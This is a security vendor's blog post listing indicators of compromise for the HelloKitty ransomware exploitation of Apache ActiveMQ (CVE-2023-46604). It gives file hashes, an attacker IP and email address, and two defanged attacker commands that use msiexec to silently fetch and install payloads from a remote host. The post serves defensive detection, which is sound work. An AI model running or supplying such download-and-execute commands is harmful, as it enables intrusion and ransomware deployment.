CVE-2023-46604: Apache ActiveMQ IoCs

Vulnerabilities
Written By Paul Kubler

In our weekly vulnerability summary, we touched on the exploitation of Apache ActiveMQ via an insecure object deserialization vulnerability. We have gathered a compilation of IoCs gathered from the FBI (full report), German CSIRT, and NCSC so you can determine if you’ve been targeted by the HelloKitty Ransomware (aka FiveHands).

File Hashes (SHA-256):

  • Rclone.exe 53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc1703

  • Mimikatz.exe 3e02e94e3ecb5d77415c25ee7ecece24953b4d7bd21bf9f9e3413ffbdad472d2

  • Advanced_IP_Scanner_2.5.3850.exe 87bfb05057f215659cc801750118900145f8a22fa93ac4c6e1bfd81aa98b0a55

  • Netscan.exe a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789

  • RouterScan.exe 18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311

  • MEGAClient.exe 9a4acb3112a52fcc58b221b12fa5e90f068247ac3f8990ff2b4bf7e20ed5b4e1

  • pCloud.exe 6ce1ab4f45c78a102197258acd2da446902dad2031825c93d875660c90df27c4

  • psexec.c 3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

  • PAExec.exe 19ce4f92e7a7b1a812ee2efa834733279ddf1052e123cf36bb77443197a0ed5f

  • my15.ps1 (Warprism) 3b90d9fad35a45a738c6b2830896168c99014474de17984411be61b25acf6db5

  • grabff.exe 7d57e0ba8b36ec221b16807ce4e13a1125d53922fa50c3827a5ebd6811736ffd

  • grbachrome.exe 374a98a083fc04f30b86718a9fe7a5a61d1afc22b93222a89d2b752b5da1df7e

  • spoolsv.exe 88a2d5cbb7ae903f8208b4a831e8ca6fb5ccb6717d4ea158ce792436aa2b9a4d

  • 9e63911b5b7e63023708125418d6d4d5.virus 59f5320b70ef8c51be409aec486366c76f6dff2730b0ab227ffd1607a4ba9b54

  • rfusclient.exe a9226978b33d0bca5b6a216b98dc25558458c28fea11d1ffc650cab1527dc5d0

  • s3browser-9-5-3.exe 5f312e137beb1ce75f8fdf03a59e1b3cba3dc57ccc16e48daee3ee52c08fa149

  • SombRAT (multiple Hashes):

    • 61e286c62e556ac79b01c17357176e58efb67d86c5d17407e128094c3151f7f9

    • 99baffcd7a6b939b72c99af7c1e88523a50053ab966a079d9bf268aff884426e

    • fdc2de095390ec046dc3f398a47a38670282bdc2ef76dd7fc1195ac4ee0421a8

    • 71c97ea6d14f4a6da86d51d07ea284447cc486488b9637f9c1de0ba42054c6f2

    • ccacf4658ae778d02e4e55cd161b5a0772eb8b8eee62fed34e2d8f11db2cc4bc

    • 15df17be2f97295b0d8d66e434e2949850c8edc2a8edddf9b30b2b638b20612b

    • e09ead5b6ac9ec9203b9fb6c9152ba451498bb291478a69ac71ff6c36c468f9e

  • ionline.exe 02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851

  • f568229e696c0e82abb35ec73d162d5e.virus c2498845ed4b287fd0f95528926c8ee620ef0cbb5b27865b2007d6379ffe4323

    HelloKitty Files (Multiple Hashes for .bin files)

    • dc007e71085297883ca68a919e37687427b7e6db0c24ca014c148f226d8dd98f

    • 947e357bfdfe411be6c97af6559fd1cdc5c9d6f5cea122bf174d124ee03d2de8

    • ef614b456ca4eaa8156a895f450577600ad41bd553b4512ae6abf3fb8b5eb04e

    • bade05a30aba181ffbe4325c1ba6c76ef9e02cbe41a4190bd3671152c51c4a7

    • 52dace403e8f9b4f7ea20c0c3565fa11b6953b404a7d49d63af237a57b36fd2a

    • a147945635d5bd0fa832c9b55bc3ebcea7a7787e8f89b98a44279f8eddda2a77

    • 0e5f7737704c8f25b2b8157561be54a463057cd4d79c7e016c30a1cf6590a85c

    • 3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9

    • 10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768

  • servmanger.exe 7be901c5f7ffeb8f99e4f5813c259d0227335680380ed06df03fb836a041cb06

  • Hi_Kitty_2.exe 501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe

  • ag.exe 9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0

  • Outlook.exe e94064401b54c399d3f844fdf08f880cb8c5d74c34de9dc28733dd22dabba678

  • M2.msi 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4

  • M4.msi 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0

  • dllloader c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7

  • EncDll 3e65437f910f1f4e93809b81c19942ef74aa250ae228caca0b278fc523ad47c5

Malicious Actions:

  • Java.exe will contain the version of ActiveMQ being targeted.

  • Remote binaries: M2.png and M4.png were loaded using MSIExec

  • Malicious .NET executables named dlloader and EncDLL run, encrypting files with “.locked” extensions.

IP Addresses:

  • 172.245.16[.]125

Email Addresses:

  • service@hellokittycat[.]online

Command Executions:

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"

If you aren’t sure where your risk lies, see how Glassportal can help you: demo@glassportal.io

Paul Kubler
Previous

Deserialization Vulnerabilities: Explain it Like I’m 5
Next

Weekly Vulnerability Summary: 7 New Vulnerabilities for the week of October 29, 2023